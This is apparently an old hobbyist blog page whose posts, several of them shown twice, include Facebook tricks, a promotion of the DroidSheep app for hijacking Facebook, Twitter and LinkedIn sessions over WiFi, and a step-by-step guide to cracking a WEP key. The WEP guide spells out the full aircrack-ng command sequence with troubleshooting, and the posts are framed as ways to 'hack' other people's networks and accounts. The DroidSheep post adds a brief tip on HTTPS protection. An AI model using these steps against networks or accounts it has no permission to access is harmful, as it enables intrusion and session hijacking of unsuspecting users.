Hello friends and readers, Our Blog is been Transferred to our new Website.
All the Post from this blog is also being transferred to our new blog on http://prince-asfi.blogspot.com/
Tuesday, March 12, 2013
Wednesday, December 12, 2012
HACK FACEBOOK AND TWITTER WITH ANDROID APP
HOW TO HACK FACEBOOK, TWITTER WITH ANDROID APP DROIDSHEEP
DriodSheep is awesome Session Hijacking Android app that can be use to hijack Wifi Sessions. Currently It support Open and WEP Encrypted networks that includes WPA and WPA2 networks (PSK).
DroidSheep enables Android-based man in the middle attacks against a wide range of Web sites, including Facebook.com, Flickr.com, Twitter.com, Linkedin.com, and non-encrypted services like "maps" on Google. There are many users that do not known that air is the transmission medium when using WiFi. Therefore information is not only transferred to its receiver but also to any other party in the network within the range of the radio waves.
Usually nothing special happens because the WiFi users discard packets that are not destined to themselves. DroidSheep does not do this. It reads all the packets looking at their contents.Is a website sending a clear recognition feature within a message’s content, which can identify a user ("SessionID"), then DroidSheep is able to read it although it is not intended to external users. Moreover DroidSheep can use this token to use it as its own. The server can’t decide whether the authorized user or DroidSheep has sent the request.
How can I protect myself?
The only satisfying answer is: SSL respectively HTTPS.
Many providers already offer HTTPS, even facebook, however it must often be enabled in the settings first.
When using HTTPS the data are still sent to alle participants in the WiFi-network, too, but because the data has been encrypted it is impossible for DroidSheep to decrypt the contect of a message - remaining only a complete mess of letters, with which an attacker can’t do anything.
DriodSheep is awesome Session Hijacking Android app that can be use to hijack Wifi Sessions. Currently It support Open and WEP Encrypted networks that includes WPA and WPA2 networks (PSK).
DroidSheep enables Android-based man in the middle attacks against a wide range of Web sites, including Facebook.com, Flickr.com, Twitter.com, Linkedin.com, and non-encrypted services like "maps" on Google. There are many users that do not known that air is the transmission medium when using WiFi. Therefore information is not only transferred to its receiver but also to any other party in the network within the range of the radio waves.
Usually nothing special happens because the WiFi users discard packets that are not destined to themselves. DroidSheep does not do this. It reads all the packets looking at their contents.Is a website sending a clear recognition feature within a message’s content, which can identify a user ("SessionID"), then DroidSheep is able to read it although it is not intended to external users. Moreover DroidSheep can use this token to use it as its own. The server can’t decide whether the authorized user or DroidSheep has sent the request.
How can I protect myself?
The only satisfying answer is: SSL respectively HTTPS.
Many providers already offer HTTPS, even facebook, however it must often be enabled in the settings first.
When using HTTPS the data are still sent to alle participants in the WiFi-network, too, but because the data has been encrypted it is impossible for DroidSheep to decrypt the contect of a message - remaining only a complete mess of letters, with which an attacker can’t do anything.
Wednesday, July 18, 2012
Insert an Animated Pictures on Facebook Cover Photo and Life Event
Facebook tricks are always cool and can’t beat up others.
Here are the steps to post animated picture on facebook! I can't post the steps on my blog because its unlawful to post without admin's permission because its copyright by PrinceAsfi.com, Click here you'll be redirected to Animation Steps.
Example: Click here to view on facebook
Here are the steps to post animated picture on facebook! I can't post the steps on my blog because its unlawful to post without admin's permission because its copyright by PrinceAsfi.com, Click here you'll be redirected to Animation Steps.
Example: Click here to view on facebook
Tuesday, July 17, 2012
New Cool Text For Facebook Chat Box
COOL TEXT FOR FACEBOOK CHAT BOX
If you want to write like that in your facebook chat?
Click on "Facebook Tricks"
Monday, July 16, 2012
HACK WIFI EASILY – SIMPLE WEP HACK
OverView
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)
Step 1 – Start the wireless interface in monitor mode on AP channel
Step 2 – Test Wireless Device Packet Injection
-a 00:1B:11:24:27:2E is the access point MAC address
Step 3 – Start airodump-ng to capture the IVs
Step 4 – Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
0 re-association timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E "(RA:|Authentication|ssoc)"
You would then look for error messages. If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: "tcpdump -n -e -s0 -vvv -i wlan1"
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80
De-Authentication: Class 3 frame received from non-associated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: "tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth". You may need to tweak the phrase "DeAuth” to pick out the exact packets you want.
Step 5 – Start aireplay-ng in ARP request replay mode
Step 6 – Run aircrack-ng to obtain the WEP key
All Done!
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)
Step 1 – Start the wireless interface in monitor mode on AP channel
airmon-ng start wlan1 6starts wifi interface in channel 6
Step 2 – Test Wireless Device Packet Injection
aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address
Step 3 – Start airodump-ng to capture the IVs
airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1
Step 4 – Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1-1 means fake authentication
0 re-association timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan12 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E "(RA:|Authentication|ssoc)"
You would then look for error messages. If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: "tcpdump -n -e -s0 -vvv -i wlan1"
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80
De-Authentication: Class 3 frame received from non-associated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: "tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth". You may need to tweak the phrase "DeAuth” to pick out the exact packets you want.
Step 5 – Start aireplay-ng in ARP request replay mode
aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
Step 6 – Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:1B:11:24:27:2E output*.cap
All Done!
Subscribe to:
Posts (Atom)
![How To Disable/Enable Facebook Timeline For Profiles/Pages On Google Chrome? [100% Working]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHlqdVafyqZG5RirjMB2kBnHKncxfyTM22JEEgYW-Rwo4bsQZhd68HuJsy6WagLkZyJTFFuWzIyAqXtqp0Rrv6tP_9CDOQJTiMSACuvVlvM7SN1FgsDsBOROuQg1_ol3rNiLFGkxb1hkq/s72-c/How-To-Permanently-Disable-Delete-Remove-Facebook-Timeline-BM.jpg)
